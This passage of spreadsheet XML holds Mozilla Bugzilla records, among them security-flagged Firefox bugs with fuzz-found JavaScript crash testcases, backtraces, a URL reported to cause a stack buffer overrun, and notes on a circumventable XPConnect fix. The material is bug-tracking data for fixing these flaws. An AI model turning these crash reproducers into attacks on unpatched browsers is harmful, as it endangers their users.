      <c r="O1761" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1761" t="inlineStr"/>
      <c r="Q1761" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1761" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1761" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1761" t="n">
        <v>1</v>
      </c>
      <c r="U1761" t="n">
        <v>0</v>
      </c>
      <c r="V1761" t="n">
        <v>9</v>
      </c>
      <c r="W1761" t="inlineStr">
        <is>
          <t>At them moment 3.6.14 build2 directory contains win32-EUBallot directory, while 3.6.13 uses win32-EUballot (lower case "b").
ftp://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/3.6.14-candidates/build2/win32-EUBallot/
vs 
ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/3.6.13/win32-EUballot/
Bouncer submitter adds entries using win32-EUballot, the previous releases also use win32-EUballot.
Assigning to Armen, who is driving 3.6.14.</t>
        </is>
      </c>
      <c r="X1761" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1762">
      <c r="A1762" t="n">
        <v>461245</v>
      </c>
      <c r="B1762" t="inlineStr">
        <is>
          <t>2008-10-22 15:24:27 -0700</t>
        </is>
      </c>
      <c r="C1762" t="inlineStr">
        <is>
          <t>[QMO2] change Sender Address for Welcome Emails</t>
        </is>
      </c>
      <c r="D1762" t="inlineStr">
        <is>
          <t>2009-07-20 09:27:59 -0700</t>
        </is>
      </c>
      <c r="E1762" t="n">
        <v>1</v>
      </c>
      <c r="F1762" t="n">
        <v>1</v>
      </c>
      <c r="G1762" t="n">
        <v>5</v>
      </c>
      <c r="H1762" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1762" t="inlineStr">
        <is>
          <t>quality.mozilla.org</t>
        </is>
      </c>
      <c r="J1762" t="inlineStr">
        <is>
          <t>Website</t>
        </is>
      </c>
      <c r="K1762" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1762" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1762" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1762" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1762" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1762" t="inlineStr"/>
      <c r="Q1762" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1762" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1762" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1762" t="n">
        <v>1</v>
      </c>
      <c r="U1762" t="n">
        <v>0</v>
      </c>
      <c r="V1762" t="n">
        <v>9</v>
      </c>
      <c r="W1762" t="inlineStr">
        <is>
          <t>Steps to reproduce:
Go to https://quality.authstage.mozilla.com/projects/category/projects/qmo-localization-planning and join the Localization Project.
You will get a confirm email with the Sender Adress Apache@mozilla.org - we should change this to a QA Email Adress
Return-Path: apache@mozilla.org
Received: from mail.mozilla.com (LHLO mail.mozilla.com) (10.2.72.15) by
 mail.mozilla.com with LMTP; Wed, 22 Oct 2008 15:20:30 -0700 (PDT)
Received: from dm-mail01.mozilla.org (dm-mail01.mozilla.org [10.2.74.105])
	by mail.mozilla.com (Postfix) with ESMTP id D7A5821003F
	for &lt;tomcat@mozilla.com&gt;; Wed, 22 Oct 2008 15:20:30 -0700 (PDT)
X-Virus-Scanned: amavisd-new at mozilla.org
X-Spam-Flag: NO
X-Spam-Score: -3.977
X-Spam-Level: 
X-Spam-Status: No, score=-3.977 required=6.31 tests=[ALL_TRUSTED=-1.665,
	BAYES_00=-2.312]
Received: from webapp-out.mozilla.org (mrapp-stage02.mozilla.org [10.2.81.29])
	by dm-mail01.mozilla.org (Postfix) with ESMTP id 8D13FB8005
	for &lt;tomcat@mozilla.com&gt;; Wed, 22 Oct 2008 15:20:29 -0700 (PDT)
Received: from mrapp-stage02.mozilla.org (unused-10-2-11-253.mozilla.org [127.0.0.1])
	by webapp-out.mozilla.org (8.13.8/8.13.8) with ESMTP id m9MMKTTV028179
	for &lt;tomcat@mozilla.com&gt;; Wed, 22 Oct 2008 15:20:29 -0700
Received: (from apache@localhost)
	by mrapp-stage02.mozilla.org (8.13.8/8.13.8/Submit) id m9MMKS0N028176;
	Wed, 22 Oct 2008 15:20:28 -0700
Date: Wed, 22 Oct 2008 15:20:28 -0700
From: Apache &lt;apache@mozilla.org&gt;
Message-Id: &lt;200810222220.m9MMKS0N028176@mrapp-stage02.mozilla.org&gt;
To: tomcat@mozilla.com
Subject: The Mozilla Team welcomes you to the QMO Localization Planning project!</t>
        </is>
      </c>
      <c r="X1762" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1763">
      <c r="A1763" t="n">
        <v>1245866</v>
      </c>
      <c r="B1763" t="inlineStr">
        <is>
          <t>2016-02-04 08:04:17 -0800</t>
        </is>
      </c>
      <c r="C1763" t="inlineStr">
        <is>
          <t>Crash at nsIDNService::IDNA2008ToUnicode nsUDPSocket::SetMulticastLoopback js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::functionDef NS_UnescapeURL arena_run_dalloc</t>
        </is>
      </c>
      <c r="D1763" t="inlineStr">
        <is>
          <t>2020-12-14 17:52:53 -0800</t>
        </is>
      </c>
      <c r="E1763" t="n">
        <v>1</v>
      </c>
      <c r="F1763" t="n">
        <v>1</v>
      </c>
      <c r="G1763" t="n">
        <v>3</v>
      </c>
      <c r="H1763" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1763" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1763" t="inlineStr">
        <is>
          <t>Networking: DNS</t>
        </is>
      </c>
      <c r="K1763" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1763" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1763" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1763" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1763" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1763" t="inlineStr">
        <is>
          <t>[adv-main45+]</t>
        </is>
      </c>
      <c r="Q1763" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1763" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1763" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T1763" t="n">
        <v>1</v>
      </c>
      <c r="U1763" t="n">
        <v>0</v>
      </c>
      <c r="V1763" t="n">
        <v>29</v>
      </c>
      <c r="W1763" t="inlineStr">
        <is>
          <t>Created attachment 8715863
bughunter stack
Found via bughunter and reproduced on a win 7 trunk debug build based on m-c tip from today
Steps to reproduce:
-&gt; Load http://estimativa.org.br/home/index.php/noticias/257-como-funciona-o-orcamento-publico 
--&gt; Crashes both opt and debug builds 
Windbg reports: STATUS_STACK_BUFFER_OVERRUN encountered 
Signature seems to be 
nsIDNService::IDNA2008ToUnicode nsUDPSocket::SetMulticastLoopback js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::functionDef NS_UnescapeURL arena_run_dalloc</t>
        </is>
      </c>
      <c r="X1763" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1764">
      <c r="A1764" t="n">
        <v>554449</v>
      </c>
      <c r="B1764" t="inlineStr">
        <is>
          <t>2010-03-23 14:02:20 -0700</t>
        </is>
      </c>
      <c r="C1764" t="inlineStr">
        <is>
          <t>Fix in bug 504021 can be circumvented</t>
        </is>
      </c>
      <c r="D1764" t="inlineStr">
        <is>
          <t>2012-04-17 10:49:59 -0700</t>
        </is>
      </c>
      <c r="E1764" t="n">
        <v>1</v>
      </c>
      <c r="F1764" t="n">
        <v>1</v>
      </c>
      <c r="G1764" t="n">
        <v>3</v>
      </c>
      <c r="H1764" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1764" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1764" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K1764" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1764" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1764" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N1764" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1764" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1764" t="inlineStr">
        <is>
          <t>[sg:critical][critsmash:resolved]</t>
        </is>
      </c>
      <c r="Q1764" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1764" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1764" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1764" t="n">
        <v>1</v>
      </c>
      <c r="U1764" t="n">
        <v>0</v>
      </c>
      <c r="V1764" t="n">
        <v>24</v>
      </c>
      <c r="W1764" t="inlineStr">
        <is>
          <t>In nsXPCWrappedJSClass::CallMethod, JS_GetMethod is called before pushing a
principal, and XPCConvert::JSData2Native is called after popping the principal.
On 1.9.0, in nsXPCWrappedJSClass::CallQueryInterfaceOnJSObject,
OBJ_GET_PROPERTY is called before pushing a principal.
1.9.0 is exploitable by bug 504021.  (On trunk/1.9.2/1.9.1, bug 504021 was
fixed by bug 503926.)
A testcase for bug 554448 (which is trunk-only) depends on this bug.</t>
        </is>
      </c>
      <c r="X1764" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1765">
      <c r="A1765" t="n">
        <v>1287532</v>
      </c>
      <c r="B1765" t="inlineStr">
        <is>
          <t>2016-07-18 11:10:13 -0700</t>
        </is>
      </c>
      <c r="C1765" t="inlineStr">
        <is>
          <t>Move various releng repos on github from 'mozilla' to 'mozilla-releng'</t>
        </is>
      </c>
      <c r="D1765" t="inlineStr">
        <is>
          <t>2022-02-10 04:46:14 -0800</t>
        </is>
      </c>
      <c r="E1765" t="n">
        <v>1</v>
      </c>
      <c r="F1765" t="n">
        <v>1</v>
      </c>
      <c r="G1765" t="n">
        <v>5</v>
      </c>
      <c r="H1765" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1765" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1765" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1765" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1765" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1765" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1765" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1765" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1765" t="inlineStr"/>
      <c r="Q1765" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1765" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1765" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1765" t="n">
        <v>1</v>
      </c>
      <c r="U1765" t="n">
        <v>0</v>
      </c>
      <c r="V1765" t="n">
        <v>8</v>
      </c>
      <c r="W1765" t="inlineStr">
        <is>
          <t>All auto deployed repos should be in mozilla-releng.</t>
        </is>
      </c>
      <c r="X1765" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1766">
      <c r="A1766" t="n">
        <v>647928</v>
      </c>
      <c r="B1766" t="inlineStr">
        <is>
          <t>2011-04-05 21:38:52 -0700</t>
        </is>
      </c>
      <c r="C1766" t="inlineStr">
        <is>
          <t>Tracking bug for build and release of SeaMonkey 2.1 Beta 3</t>
        </is>
      </c>
      <c r="D1766" t="inlineStr">
        <is>
          <t>2011-04-22 17:34:08 -0700</t>
        </is>
      </c>
      <c r="E1766" t="n">
        <v>1</v>
      </c>
      <c r="F1766" t="n">
        <v>1</v>
      </c>
      <c r="G1766" t="n">
        <v>2</v>
      </c>
      <c r="H1766" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1766" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J1766" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="K1766" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1766" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1766" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1766" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1766" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1766" t="inlineStr"/>
      <c r="Q1766" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1766" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1766" t="inlineStr">
        <is>
          <t>seamonkey2.1b3</t>
        </is>
      </c>
      <c r="T1766" t="n">
        <v>1</v>
      </c>
      <c r="U1766" t="n">
        <v>0</v>
      </c>
      <c r="V1766" t="n">
        <v>9</v>
      </c>
      <c r="W1766" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #631278 +++
2.1b3 will be feature and string freeze.</t>
        </is>
      </c>
      <c r="X1766" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1767">
      <c r="A1767" t="n">
        <v>1242798</v>
      </c>
      <c r="B1767" t="inlineStr">
        <is>
          <t>2016-01-25 16:25:28 -0800</t>
        </is>
      </c>
      <c r="C1767" t="inlineStr">
        <is>
          <t>Assertion failure: tag &lt;= CalleeToken_Script, at js/src/jit/JitFrames.h:34 or Crash [@ hasUncompiledScript] with Debugger</t>
        </is>
      </c>
      <c r="D1767" t="inlineStr">
        <is>
          <t>2017-01-05 09:08:22 -0800</t>
        </is>
      </c>
      <c r="E1767" t="n">
        <v>1</v>
      </c>
      <c r="F1767" t="n">
        <v>1</v>
      </c>
      <c r="G1767" t="n">
        <v>3</v>
      </c>
      <c r="H1767" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1767" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1767" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1767" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1767" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1767" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1767" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1767" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1767" t="inlineStr">
        <is>
          <t>[jsbugmon:update,ignore][adv-main47+]</t>
        </is>
      </c>
      <c r="Q1767" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1767" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1767" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T1767" t="n">
        <v>1</v>
      </c>
      <c r="U1767" t="n">
        <v>0</v>
      </c>
      <c r="V1767" t="n">
        <v>15</v>
      </c>
      <c r="W1767" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision c2256ee8ae9a (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --target=i686-pc-linux-gnu --disable-tests --enable-debug, run with --ion-eager):
var g = newGlobal();
var dbg = new Debugger(g);
g.eval("" + function f(c) {
  if (c == 0)
    return;
  if (c == 2)
    debugger;
  f(c-1);
  for (var i = 0; i &lt; 100; i++)
    Debugger += newGlobal('#15: myObj.parseFloat !== parseFloat');
});
dbg.onDebuggerStatement = function (frame) {};
g.eval("f(2)");
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
0x0807816e in js::jit::GetCalleeTokenTag (token=&lt;optimized out&gt;) at js/src/jit/JitFrames.h:34
#0  0x0807816e in js::jit::GetCalleeTokenTag (token=&lt;optimized out&gt;) at js/src/jit/JitFrames.h:34
#1  0x082374f8 in GetCalleeTokenTag (token=&lt;optimized out&gt;) at js/src/vm/Stack.h:177
#2  ScriptFromCalleeToken (token=&lt;optimized out&gt;) at js/src/jit/JitFrames.h:81
#3  script (this=&lt;optimized out&gt;) at js/src/jit/BaselineFrame.h:147
#4  js::AbstractFramePtr::script (this=0xffffc200) at js/src/vm/Stack-inl.h:663
#5  0x08679e8a in js::Debugger::removeDebuggeeGlobal (this=0xf7a70000, fop=fop@entry=0xffffc4c0, global=global@entry=0xf456e040, debugEnum=0x0) at js/src/vm/Debugger.cpp:3572
#6  0x0867a1ff in js::Debugger::detachAllDebuggersFromGlobal (fop=fop@entry=0xffffc4c0, global=0xf456e040) at js/src/vm/Debugger.cpp:2696
#7  0x0856927e in JSCompartment::sweepGlobalObject (this=0xf43e7000, fop=fop@entry=0xffffc4c0) at js/src/jscompartment.cpp:683
#8  0x085a1774 in js::gc::GCRuntime::beginSweepingZoneGroup (this=this@entry=0xf7a39224) at js/src/jsgc.cpp:5189
#9  0x085a98dc in js::gc::GCRuntime::beginSweepPhase (this=this@entry=0xf7a39224, destroyingRuntime=destroyingRuntime@entry=false) at js/src/jsgc.cpp:5375
#10 0x085aaef3 in js::gc::GCRuntime::incrementalCollectSlice (this=this@entry=0xf7a39224, budget=..., reason=reason@entry=JS::gcreason::DESTROY_CONTEXT) at js/src/jsgc.cpp:6136
#11 0x085abcc1 in js::gc::GCRuntime::gcCycle (this=this@entry=0xf7a39224, nonincrementalByAPI=nonincrementalByAPI@entry=true, budget=..., reason=reason@entry=JS::gcreason::DESTROY_CONTEXT) at js/src/jsgc.cpp:6344
#12 0x085ac219 in js::gc::GCRuntime::collect (this=this@entry=0xf7a39224, nonincrementalByAPI=nonincrementalByAPI@entry=true, budget=..., reason=reason@entry=JS::gcreason::DESTROY_CONTEXT) at js/src/jsgc.cpp:6450
#13 0x085ac482 in js::gc::GCRuntime::gc (this=this@entry=0xf7a39224, gckind=gckind@entry=GC_NORMAL, reason=reason@entry=JS::gcreason::DESTROY_CONTEXT) at js/src/jsgc.cpp:6508
#14 0x08558d30 in js::DestroyContext (cx=cx@entry=0xf7a87020, mode=mode@entry=js::DCM_FORCE_GC) at js/src/jscntxt.cpp:181
#15 0x08558f78 in JS_DestroyContext (cx=cx@entry=0xf7a87020) at js/src/jsapi.cpp:580
#16 0x080d94d7 in DestroyContext (withGC=true, cx=&lt;optimized out&gt;) at js/src/shell/js.cpp:6103
#17 main (argc=3, argv=0xffffcc54, envp=0xffffcc64) at js/src/shell/js.cpp:7008
eax	0x0	0
ebx	0x98448f0	159664368
ecx	0xf7e3b88c	-136071028
edx	0x0	0
esi	0xffffc210	-15856
edi	0x0	0
ebp	0xffffc188	4294951304
esp	0xffffc170	4294951280
eip	0x807816e &lt;js::jit::GetCalleeTokenTag(js::jit::CalleeToken)+42&gt;
=&gt; 0x807816e &lt;js::jit::GetCalleeTokenTag(js::jit::CalleeToken)+42&gt;:	movl   $0x22,0x0
   0x8078178 &lt;js::jit::GetCalleeTokenTag(js::jit::CalleeToken)+52&gt;:	call   0x80fed10 &lt;abort()&gt;</t>
        </is>
      </c>
      <c r="X1767" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1768">
      <c r="A1768" t="n">
        <v>762920</v>
      </c>
      <c r="B1768" t="inlineStr">
        <is>
          <t>2012-06-08 07:57:51 -0700</t>
        </is>
      </c>
      <c r="C1768" t="inlineStr">
        <is>
          <t>Bug 754202 regressed IsCapabilityEnabled</t>
        </is>
      </c>
      <c r="D1768" t="inlineStr">
        <is>
          <t>2019-03-31 01:57:46 -0700</t>
        </is>
      </c>
      <c r="E1768" t="n">
        <v>1</v>
      </c>
      <c r="F1768" t="n">
        <v>1</v>
      </c>
      <c r="G1768" t="n">
        <v>3</v>
      </c>
      <c r="H1768" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1768" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1768" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K1768" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1768" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1768" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N1768" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1768" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1768" t="inlineStr">
        <is>
          <t>[advisory-tracking-] new in Fx 16</t>
        </is>
      </c>
      <c r="Q1768" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1768" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1768" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1768" t="n">
        <v>1</v>
      </c>
      <c r="U1768" t="n">
        <v>0</v>
      </c>
      <c r="V1768" t="n">
        <v>13</v>
      </c>
      <c r="W1768" t="inlineStr">
        <is>
          <t>When there is no frame, the result of IsCapabilityEnabled is always true.  This is not good since event listeners can be called with no frame.</t>
        </is>
      </c>
      <c r="X1768" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1769">
      <c r="A1769" t="n">
        <v>1331405</v>
      </c>
      <c r="B1769" t="inlineStr">
        <is>
          <t>2017-01-16 08:56:09 -0800</t>
        </is>
      </c>
      <c r="C1769" t="inlineStr">
        <is>
          <t>Assertion failure: !current, at js/src/jit/IonControlFlow.cpp:605</t>
        </is>
      </c>
      <c r="D1769" t="inlineStr">
        <is>
          <t>2017-01-18 14:20:11 -0800</t>
        </is>
      </c>
      <c r="E1769" t="n">
        <v>1</v>
      </c>
      <c r="F1769" t="n">
        <v>1</v>
      </c>
      <c r="G1769" t="n">
        <v>3</v>
      </c>
      <c r="H1769" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1769" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1769" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K1769" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1769" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1769" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1769" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1769" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1769" t="inlineStr">
        <is>
          <t>[jsbugmon:update,bisect][fuzzblocker]</t>
        </is>
      </c>
      <c r="Q1769" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1769" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1769" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T1769" t="n">
        <v>1</v>
      </c>
      <c r="U1769" t="n">
        <v>0</v>
      </c>
      <c r="V1769" t="n">
        <v>5</v>
      </c>
      <c r="W1769" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 8eaf154b385b (build with --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-debug --enable-optimize, run with --fuzzing-safe --ion-eager):
++f();
try {} catch (e) {}
Backtrace:
#0  js::jit::ControlFlowGenerator::processTryEnd (this=0x7fffffffc7d0, state=...) at js/src/jit/IonControlFlow.cpp:605
#1  0x00000000006a7321 in js::jit::ControlFlowGenerator::processCfgStack (this=this@entry=0x7fffffffc7d0) at js/src/jit/IonControlFlow.cpp:393
#2  0x00000000006a8364 in js::jit::ControlFlowGenerator::traverseBytecode (this=this@entry=0x7fffffffc7d0) at js/src/jit/IonControlFlow.cpp:222
#3  0x0000000000630980 in GetOrCreateControlFlowGraph (tempAlloc=..., script=0x7ffff0690120, cfgOut=cfgOut@entry=0x7ffff69b54c0) at js/src/jit/IonBuilder.cpp:1356
#4  0x0000000000645ffe in js::jit::IonBuilder::traverseBytecode (this=this@entry=0x7ffff69b51c8) at js/src/jit/IonBuilder.cpp:1413
#5  0x0000000000647119 in js::jit::IonBuilder::build (this=this@entry=0x7ffff69b51c8) at js/src/jit/IonBuilder.cpp:842
#6  0x000000000065cbf9 in js::jit::IonCompile (cx=cx@entry=0x7ffff695f000, script=&lt;optimized out&gt;, baselineFrame=baselineFrame@entry=0x0, osrPc=&lt;optimized out&gt;, recompile=&lt;optimized out&gt;, optimizationLevel=optimizationLevel@entry=js::jit::OptimizationLevel::Normal) at js/src/jit/Ion.cpp:2280
#7  0x000000000065d632 in js::jit::Compile (cx=0x7ffff695f000, script=script@entry=..., osrFrame=osrFrame@entry=0x0, osrPc=osrPc@entry=0x0, forceRecompile=forceRecompile@entry=false) at js/src/jit/Ion.cpp:2533
#8  0x000000000065d822 in js::jit::CanEnter (cx=cx@entry=0x7ffff695f000, state=...) at js/src/jit/Ion.cpp:2630
#9  0x00000000005422f3 in js::RunScript (cx=0x7ffff695f000, state=...) at js/src/vm/Interpreter.cpp:379
#10 0x0000000000544a90 in js::ExecuteKernel (cx=0x7ffff695f000, script=..., script@entry=..., envChainArg=..., newTargetValue=..., evalInFrame=..., evalInFrame@entry=..., result=result@entry=0x0) at js/src/vm/Interpreter.cpp:684
#11 0x0000000000544fe8 in js::Execute (cx=cx@entry=0x7ffff695f000, script=script@entry=..., envChainArg=..., rval=rval@entry=0x0) at js/src/vm/Interpreter.cpp:717
#12 0x000000000088db02 in ExecuteScript (cx=0x7ffff695f000, scope=scope@entry=..., script=script@entry=..., rval=rval@entry=0x0) at js/src/jsapi.cpp:4410
#13 0x00000000008aafd0 in JS_ExecuteScript (cx=0x7ffff695f000, scriptArg=scriptArg@entry=...) at js/src/jsapi.cpp:4443
#14 0x000000000042baee in RunFile (compileOnly=&lt;optimized out&gt;, file=0x7ffff69a6000, filename=&lt;optimized out&gt;, cx=0x7ffff695f000) at js/src/shell/js.cpp:647
#15 Process (cx=&lt;optimized out&gt;, filename=&lt;optimized out&gt;, forceTTY=forceTTY@entry=false, kind=kind@entry=FileScript) at js/src/shell/js.cpp:1078
#16 0x00000000004383d0 in ProcessArgs (op=0x7fffffffdaa0, cx=0x7ffff695f000) at js/src/shell/js.cpp:7223
#17 Shell (envp=&lt;optimized out&gt;, op=0x7fffffffdaa0, cx=0x7ffff695f000) at js/src/shell/js.cpp:7585
#18 main (argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;, envp=&lt;optimized out&gt;) at js/src/shell/js.cpp:7963
rax	0x2064520	33965344
rbx	0x7fffffffc7d0	140737488340944
rcx	0x117eb27	18344743
rdx	0x0	0
rsi	0x7ffff6ef7770	140737336276848
rdi	0x7ffff6ef6540	140737336272192
rbp	0x7fffffffc6b0	140737488340656
rsp	0x7fffffffc690	140737488340624
r8	0x7ffff6ef7770	140737336276848
r9	0x7ffff7fe4740	140737354024768
r10	0x58	88
r11	0x7ffff6b9f750	140737332770640
r12	0x7fffffffc8c0	140737488341184
r13	0x7fffffffc720	140737488340768
r14	0x7ffff0327140	140737223225664
r15	0x7fffffffc7d0	140737488340944
rip	0x683235 &lt;js::jit::ControlFlowGenerator::processTryEnd(js::jit::ControlFlowGenerator::CFGState&amp;)+229&gt;
=&gt; 0x683235 &lt;js::jit::ControlFlowGenerator::processTryEnd(js::jit::ControlFlowGenerator::CFGState&amp;)+229&gt;:	movl   $0x0,0x0
   0x683240 &lt;js::jit::ControlFlowGenerator::processTryEnd(js::jit::ControlFlowGenerator::CFGState&amp;)+240&gt;:	ud2    
This is a fuzzblocker, occurring with high frequency, needs immediate fixing for JS fuzzing to work.</t>
        </is>
      </c>
      <c r="X1769" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1770">
      <c r="A1770" t="n">
        <v>1465686</v>
      </c>
      <c r="B1770" t="inlineStr">
        <is>
          <t>2018-05-30 21:14:29 -0700</t>
        </is>
      </c>
      <c r="C1770" t="inlineStr">
        <is>
          <t>Heap overflow write in SkEdgeBuilder::buildPoly</t>
        </is>
      </c>
      <c r="D1770" t="inlineStr">
        <is>
          <t>2024-05-30 09:46:29 -0700</t>
        </is>
      </c>
      <c r="E1770" t="n">
        <v>1</v>
      </c>
      <c r="F1770" t="n">
        <v>1</v>
      </c>
      <c r="G1770" t="n">
        <v>3</v>
      </c>
      <c r="H1770" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1770" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1770" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K1770" t="inlineStr">
        <is>
          <t>60 Branch</t>
        </is>
      </c>
      <c r="L1770" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1770" t="inlineStr">
        <is>
